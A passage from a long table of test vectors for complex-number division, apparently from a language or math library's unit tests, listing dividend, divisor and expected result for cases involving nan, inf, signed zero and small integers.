-inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(-1, zero), complex(zero, zero), complex(-inf, nan)}, {complex(-1, zero), complex(zero, -zero), complex(-inf, nan)}, {complex(-1, zero), complex(zero, 1), complex(zero, 1)}, {complex(-1, zero), complex(zero, -1), complex(-zero, -1)}, {complex(-1, zero), complex(zero, 2), complex(zero, 0.5)}, {complex(-1, zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, zero), complex(zero, zero), complex(-inf, nan)}, {complex(-1, zero), complex(-zero, -zero), complex(inf, nan)}, {complex(-1, zero), complex(zero, 1), complex(zero, 1)}, {complex(-1, zero), complex(-zero, -1), complex(-zero, -1)}, {complex(-1, zero), complex(zero, 2), complex(zero, 0.5)}, {complex(-1, zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, zero), complex(1, zero), complex(-1, zero)}, {complex(-1, zero), complex(1, -zero), complex(-1, zero)}, {complex(-1, zero), complex(1, 1), complex(-0.5, 0.5)}, {complex(-1, zero), complex(1, -1), complex(-0.5, -0.5)}, {complex(-1, zero), complex(1, 2), complex(-0.2, 0.4)}, {complex(-1, zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, zero), complex(-1, zero), complex(1, -zero)}, {complex(-1, zero), complex(-1, -zero), complex(1, -zero)}, {complex(-1, zero), complex(-1, 1), complex(0.5, 0.5)}, {complex(-1, zero), complex(-1, -1), complex(0.5, -0.5)}, {complex(-1, zero), complex(-1, 2), complex(0.2, 0.4)}, {complex(-1, zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, zero), complex(2, zero), complex(-0.5, zero)}, {complex(-1, zero), complex(2, -zero), complex(-0.5, zero)}, {complex(-1, zero), complex(2, 1), complex(-0.4, 0.2)}, {complex(-1, zero), complex(2, -1), complex(-0.4, -0.2)}, {complex(-1, zero), complex(2, 2), complex(-0.25, 0.25)}, {complex(-1, zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, zero), complex(nan, zero), complex(nan, nan)}, {complex(-1, zero), complex(nan, -zero), complex(nan, nan)}, {complex(-1, zero), complex(nan, 1), complex(nan, nan)}, {complex(-1, zero), complex(nan, -1), complex(nan, nan)}, {complex(-1, zero), complex(nan, 2), complex(nan, nan)}, {complex(-1, zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, zero), complex(inf, zero), complex(-zero, zero)}, {complex(-1, zero), complex(inf, -zero), complex(-zero, zero)}, {complex(-1, zero), complex(inf, 1), complex(-zero, zero)}, {complex(-1, zero), complex(inf, -1), complex(-zero, zero)}, {complex(-1, zero), complex(inf, 2), complex(-zero, zero)}, {complex(-1, zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, zero), complex(-inf, zero), complex(zero, -zero)}, {complex(-1, zero), complex(-inf, -zero), complex(zero, -zero)}, {complex(-1, zero), complex(-inf, 1), complex(zero, -zero)}, {complex(-1, zero), complex(-inf, -1), complex(zero, -zero)}, {complex(-1, zero), complex(-inf, 2), complex(zero, -zero)}, {complex(-1, zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -zero), complex(zero, zero), complex(-inf, nan)}, {complex(-1, -zero), complex(zero, -zero), complex(-inf, nan)}, {complex(-1, -zero), complex(zero, 1), complex(-zero, 1)}, {complex(-1, -zero), complex(zero, -1), complex(-zero, -1)}, {complex(-1, -zero), complex(zero, 2), complex(-zero, 0.5)}, {complex(-1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, -zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -zero), complex(zero, zero), complex(-inf, nan)}, {complex(-1, -zero), complex(-zero, -zero), complex(inf, nan)}, {complex(-1, -zero), complex(zero, 1), complex(-zero, 1)}, {complex(-1, -zero), complex(-zero, -1), complex(zero, -1)}, {complex(-1, -zero), complex(zero, 2), complex(-zero, 0.5)}, {complex(-1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, -zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -zero), complex(1, zero), complex(-1, zero)}, {complex(-1, -zero), complex(1, -zero), complex(-1, -zero)}, {complex(-1, -zero), complex(1, 1), complex(-0.5, 0.5)}, {complex(-1, -zero), complex(1, -1), complex(-0.5, -0.5)}, {complex(-1, -zero), complex(1, 2), complex(-0.2, 0.4)}, {complex(-1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, -zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -zero), complex(-1, zero), complex(1, zero)}, {complex(-1, -zero), complex(-1, -zero), complex(1, -zero)}, {complex(-1, -zero), complex(-1, 1), complex(0.5, 0.5)}, {complex(-1, -zero), complex(-1, -1), complex(0.5, -0.5)}, {complex(-1, -zero), complex(-1, 2), complex(0.2, 0.4)}, {complex(-1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, -zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -zero), complex(2, zero), complex(-0.5, zero)}, {complex(-1, -zero), complex(2, -zero), complex(-0.5, -zero)}, {complex(-1, -zero), complex(2, 1), complex(-0.4, 0.2)}, {complex(-1, -zero), complex(2, -1), complex(-0.4, -0.2)}, {complex(-1, -zero), complex(2, 2), complex(-0.25, 0.25)}, {complex(-1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, -zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -zero), complex(nan, zero), complex(nan, nan)}, {complex(-1, -zero), complex(nan, -zero), complex(nan, nan)}, {complex(-1, -zero), complex(nan, 1), complex(nan, nan)}, {complex(-1, -zero), complex(nan, -1), complex(nan, nan)}, {complex(-1, -zero), complex(nan, 2), complex(nan, nan)}, {complex(-1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, -zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -zero), complex(inf, zero), complex(-zero, zero)}, {complex(-1, -zero), complex(inf, -zero), complex(-zero, -zero)}, {complex(-1, -zero), complex(inf, 1), complex(-zero, zero)}, {complex(-1, -zero), complex(inf, -1), complex(-zero, -zero)}, {complex(-1, -zero), complex(inf, 2), complex(-zero, zero)}, {complex(-1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, -zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -zero), complex(-inf, zero), complex(zero, zero)}, {complex(-1, -zero), complex(-inf, -zero), complex(zero, -zero)}, {complex(-1, -zero), complex(-inf, 1), complex(zero, zero)}, {complex(-1, -zero), complex(-inf, -1), complex(zero, -zero)}, {complex(-1, -zero), complex(-inf, 2), complex(zero, zero)}, {complex(-1, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-1, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-1, -zero), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, 1), complex(zero, zero), complex(-inf, inf)}, {complex(-1, 1), complex(zero, -zero), complex(-inf, inf)}, {complex(-1, 1), complex(zero, 1), complex(1, 1)}, {complex(-1, 1), complex(zero, -1), complex(-1, -1)}, {complex(-1, 1), complex(zero, 2), complex(0.5, 0.5)}, {complex(-1, 1), complex(nan, nan), complex(nan, nan)}, {complex(-1, 1), complex(nan, inf), complex(zero, zero)}, {complex(-1, 1), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 1), complex(zero, zero), complex(-inf, inf)}, {complex(-1, 1), complex(-zero, -zero), complex(inf, -inf)}, {complex(-1, 1), complex(zero, 1), complex(1, 1)}, {complex(-1, 1), complex(-zero, -1), complex(-1, -1)}, {complex(-1, 1), complex(zero, 2), complex(0.5, 0.5)}, {complex(-1, 1), complex(nan, nan), complex(nan, nan)}, {complex(-1, 1), complex(nan, inf), complex(zero, zero)}, {complex(-1, 1), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 1), complex(1, zero), complex(-1, 1)}, {complex(-1, 1), complex(1, -zero), complex(-1, 1)}, {complex(-1, 1), complex(1, 1), complex(zero, 1)}, {complex(-1, 1), complex(1, -1), complex(-1, zero)}, {complex(-1, 1), complex(1, 2), complex(0.2, 0.6)}, {complex(-1, 1), complex(nan, nan), complex(nan, nan)}, {complex(-1, 1), complex(nan, inf), complex(zero, zero)}, {complex(-1, 1), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 1), complex(-1, zero), complex(1, -1)}, {complex(-1, 1), complex(-1, -zero), complex(1, -1)}, {complex(-1, 1), complex(-1, 1), complex(1, -zero)}, {complex(-1, 1), complex(-1, -1), complex(-zero, -1)}, {complex(-1, 1), complex(-1, 2), complex(0.6, 0.2)}, {complex(-1, 1), complex(nan, nan), complex(nan, nan)}, {complex(-1, 1), complex(nan, inf), complex(zero, zero)}, {complex(-1, 1), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 1), complex(2, zero), complex(-0.5, 0.5)}, {complex(-1, 1), complex(2, -zero), complex(-0.5, 0.5)}, {complex(-1, 1), complex(2, 1), complex(-0.2, 0.6)}, {complex(-1, 1), complex(2, -1), complex(-0.6, 0.2)}, {complex(-1, 1), complex(2, 2), complex(zero, 0.5)}, {complex(-1, 1), complex(nan, nan), complex(nan, nan)}, {complex(-1, 1), complex(nan, inf), complex(zero, zero)}, {complex(-1, 1), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 1), complex(nan, zero), complex(nan, nan)}, {complex(-1, 1), complex(nan, -zero), complex(nan, nan)}, {complex(-1, 1), complex(nan, 1), complex(nan, nan)}, {complex(-1, 1), complex(nan, -1), complex(nan, nan)}, {complex(-1, 1), complex(nan, 2), complex(nan, nan)}, {complex(-1, 1), complex(nan, nan), complex(nan, nan)}, {complex(-1, 1), complex(nan, inf), complex(zero, zero)}, {complex(-1, 1), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 1), complex(inf, zero), complex(-zero, zero)}, {complex(-1, 1), complex(inf, -zero), complex(-zero, zero)}, {complex(-1, 1), complex(inf, 1), complex(-zero, zero)}, {complex(-1, 1), complex(inf, -1), complex(-zero, zero)}, {complex(-1, 1), complex(inf, 2), complex(-zero, zero)}, {complex(-1, 1), complex(nan, nan), complex(nan, nan)}, {complex(-1, 1), complex(nan, inf), complex(zero, zero)}, {complex(-1, 1), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 1), complex(-inf, zero), complex(zero, -zero)}, {complex(-1, 1), complex(-inf, -zero), complex(zero, -zero)}, {complex(-1, 1), complex(-inf, 1), complex(zero, -zero)}, {complex(-1, 1), complex(-inf, -1), complex(zero, -zero)}, {complex(-1, 1), complex(-inf, 2), complex(zero, -zero)}, {complex(-1, 1), complex(nan, nan), complex(nan, nan)}, {complex(-1, 1), complex(nan, inf), complex(zero, zero)}, {complex(-1, 1), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, -1), complex(zero, zero), complex(-inf, -inf)}, {complex(-1, -1), complex(zero, -zero), complex(-inf, -inf)}, {complex(-1, -1), complex(zero, 1), complex(-1, 1)}, {complex(-1, -1), complex(zero, -1), complex(1, -1)}, {complex(-1, -1), complex(zero, 2), complex(-0.5, 0.5)}, {complex(-1, -1), complex(nan, nan), complex(nan, nan)}, {complex(-1, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-1, -1), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -1), complex(zero, zero), complex(-inf, -inf)}, {complex(-1, -1), complex(-zero, -zero), complex(inf, inf)}, {complex(-1, -1), complex(zero, 1), complex(-1, 1)}, {complex(-1, -1), complex(-zero, -1), complex(1, -1)}, {complex(-1, -1), complex(zero, 2), complex(-0.5, 0.5)}, {complex(-1, -1), complex(nan, nan), complex(nan, nan)}, {complex(-1, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-1, -1), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -1), complex(1, zero), complex(-1, -1)}, {complex(-1, -1), complex(1, -zero), complex(-1, -1)}, {complex(-1, -1), complex(1, 1), complex(-1, zero)}, {complex(-1, -1), complex(1, -1), complex(zero, -1)}, {complex(-1, -1), complex(1, 2), complex(-0.6, 0.2)}, {complex(-1, -1), complex(nan, nan), complex(nan, nan)}, {complex(-1, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-1, -1), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -1), complex(-1, zero), complex(1, 1)}, {complex(-1, -1), complex(-1, -zero), complex(1, 1)}, {complex(-1, -1), complex(-1, 1), complex(-zero, 1)}, {complex(-1, -1), complex(-1, -1), complex(1, -zero)}, {complex(-1, -1), complex(-1, 2), complex(-0.2, 0.6)}, {complex(-1, -1), complex(nan, nan), complex(nan, nan)}, {complex(-1, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-1, -1), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -1), complex(2, zero), complex(-0.5, -0.5)}, {complex(-1, -1), complex(2, -zero), complex(-0.5, -0.5)}, {complex(-1, -1), complex(2, 1), complex(-0.6, -0.2)}, {complex(-1, -1), complex(2, -1), complex(-0.2, -0.6)}, {complex(-1, -1), complex(2, 2), complex(-0.5, zero)}, {complex(-1, -1), complex(nan, nan), complex(nan, nan)}, {complex(-1, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-1, -1), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -1), complex(nan, zero), complex(nan, nan)}, {complex(-1, -1), complex(nan, -zero), complex(nan, nan)}, {complex(-1, -1), complex(nan, 1), complex(nan, nan)}, {complex(-1, -1), complex(nan, -1), complex(nan, nan)}, {complex(-1, -1), complex(nan, 2), complex(nan, nan)}, {complex(-1, -1), complex(nan, nan), complex(nan, nan)}, {complex(-1, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-1, -1), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -1), complex(inf, zero), complex(-zero, -zero)}, {complex(-1, -1), complex(inf, -zero), complex(-zero, -zero)}, {complex(-1, -1), complex(inf, 1), complex(-zero, -zero)}, {complex(-1, -1), complex(inf, -1), complex(-zero, -zero)}, {complex(-1, -1), complex(inf, 2), complex(-zero, -zero)}, {complex(-1, -1), complex(nan, nan), complex(nan, nan)}, {complex(-1, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-1, -1), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, -1), complex(-inf, zero), complex(zero, zero)}, {complex(-1, -1), complex(-inf, -zero), complex(zero, zero)}, {complex(-1, -1), complex(-inf, 1), complex(zero, zero)}, {complex(-1, -1), complex(-inf, -1), complex(zero, zero)}, {complex(-1, -1), complex(-inf, 2), complex(zero, zero)}, {complex(-1, -1), complex(nan, nan), complex(nan, nan)}, {complex(-1, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-1, -1), complex(nan, -inf), complex(zero, -zero)}, {complex(-1, 2), complex(zero, zero), complex(-inf, inf)}, {complex(-1, 2), complex(zero, -zero), complex(-inf, inf)}, {complex(-1, 2), complex(zero, 1), complex(2, 1)}, {complex(-1, 2), complex(zero, -1), complex(-2, -1)}, {complex(-1, 2), complex(zero, 2), complex(1, 0.5)}, {complex(-1, 2), complex(nan, nan), complex(nan, nan)}, {complex(-1, 2), complex(nan, inf), complex(zero, zero)}, {complex(-1, 2), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 2), complex(zero, zero), complex(-inf, inf)}, {complex(-1, 2), complex(-zero, -zero), complex(inf, -inf)}, {complex(-1, 2), complex(zero, 1), complex(2, 1)}, {complex(-1, 2), complex(-zero, -1), complex(-2, -1)}, {complex(-1, 2), complex(zero, 2), complex(1, 0.5)}, {complex(-1, 2), complex(nan, nan), complex(nan, nan)}, {complex(-1, 2), complex(nan, inf), complex(zero, zero)}, {complex(-1, 2), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 2), complex(1, zero), complex(-1, 2)}, {complex(-1, 2), complex(1, -zero), complex(-1, 2)}, {complex(-1, 2), complex(1, 1), complex(0.5, 1.5)}, {complex(-1, 2), complex(1, -1), complex(-1.5, 0.5)}, {complex(-1, 2), complex(1, 2), complex(0.6, 0.8)}, {complex(-1, 2), complex(nan, nan), complex(nan, nan)}, {complex(-1, 2), complex(nan, inf), complex(zero, zero)}, {complex(-1, 2), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 2), complex(-1, zero), complex(1, -2)}, {complex(-1, 2), complex(-1, -zero), complex(1, -2)}, {complex(-1, 2), complex(-1, 1), complex(1.5, -0.5)}, {complex(-1, 2), complex(-1, -1), complex(-0.5, -1.5)}, {complex(-1, 2), complex(-1, 2), complex(1, zero)}, {complex(-1, 2), complex(nan, nan), complex(nan, nan)}, {complex(-1, 2), complex(nan, inf), complex(zero, zero)}, {complex(-1, 2), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 2), complex(2, zero), complex(-0.5, 1)}, {complex(-1, 2), complex(2, -zero), complex(-0.5, 1)}, {complex(-1, 2), complex(2, 1), complex(zero, 1)}, {complex(-1, 2), complex(2, -1), complex(-0.8, 0.6)}, {complex(-1, 2), complex(2, 2), complex(0.25, 0.75)}, {complex(-1, 2), complex(nan, nan), complex(nan, nan)}, {complex(-1, 2), complex(nan, inf), complex(zero, zero)}, {complex(-1, 2), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 2), complex(nan, zero), complex(nan, nan)}, {complex(-1, 2), complex(nan, -zero), complex(nan, nan)}, {complex(-1, 2), complex(nan, 1), complex(nan, nan)}, {complex(-1, 2), complex(nan, -1), complex(nan, nan)}, {complex(-1, 2), complex(nan, 2), complex(nan, nan)}, {complex(-1, 2), complex(nan, nan), complex(nan, nan)}, {complex(-1, 2), complex(nan, inf), complex(zero, zero)}, {complex(-1, 2), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 2), complex(inf, zero), complex(-zero, zero)}, {complex(-1, 2), complex(inf, -zero), complex(-zero, zero)}, {complex(-1, 2), complex(inf, 1), complex(-zero, zero)}, {complex(-1, 2), complex(inf, -1), complex(-zero, zero)}, {complex(-1, 2), complex(inf, 2), complex(-zero, zero)}, {complex(-1, 2), complex(nan, nan), complex(nan, nan)}, {complex(-1, 2), complex(nan, inf), complex(zero, zero)}, {complex(-1, 2), complex(nan, -inf), complex(-zero, -zero)}, {complex(-1, 2), complex(-inf, zero), complex(zero, -zero)}, {complex(-1, 2), complex(-inf, -zero), complex(zero, -zero)}, {complex(-1, 2), complex(-inf, 1), complex(zero, -zero)}, {complex(-1, 2), complex(-inf, -1), complex(zero, -zero)}, {complex(-1, 2), complex(-inf, 2), complex(zero, -zero)}, {complex(-1, 2), complex(nan, nan), complex(nan, nan)}, {complex(-1, 2), complex(nan, inf), complex(zero, zero)}, {complex(-1, 2), complex(nan, -inf), complex(-zero, -zero)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(1, zero), complex(nan, nan)}, {complex(nan, nan), complex(1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(1, 1), complex(nan, nan)}, {complex(nan, nan), complex(1, -1), complex(nan, nan)}, {complex(nan, nan), complex(1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-1, zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, 1), complex(nan, nan)}, {complex(nan, nan), complex(-1, -1), complex(nan, nan)}, {complex(nan, nan), complex(-1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(2, zero), complex(nan, nan)}, {complex(nan, nan), complex(2, -zero), complex(nan, nan)}, {complex(nan, nan), complex(2, 1), complex(nan, nan)}, {complex(nan, nan), complex(2, -1), complex(nan, nan)}, {complex(nan, nan), complex(2, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, -zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, 1), complex(nan, nan)}, {complex(nan, nan), complex(nan, -1), complex(nan, nan)}, {complex(nan, nan), complex(nan, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, -zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(-zero, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(-zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(1, zero), complex(nan, inf)}, {complex(nan, inf), complex(1, -zero), complex(nan, inf)}, {complex(nan, inf), complex(1, 1), complex(inf, inf)}, {complex(nan, inf), complex(1, -1), complex(-inf, inf)}, {complex(nan, inf), complex(1, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-1, zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, 1), complex(inf, -inf)}, {complex(nan, inf), complex(-1, -1), complex(-inf, -inf)}, {complex(nan, inf), complex(-1, 2), complex(inf, -inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(2, zero), complex(nan, inf)}, {complex(nan, inf), complex(2, -zero), complex(nan, inf)}, {complex(nan, inf), complex(2, 1), complex(inf, inf)}, {complex(nan, inf), complex(2, -1), complex(-inf, inf)}, {complex(nan, inf), complex(2, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(-zero, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(-zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(1, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, 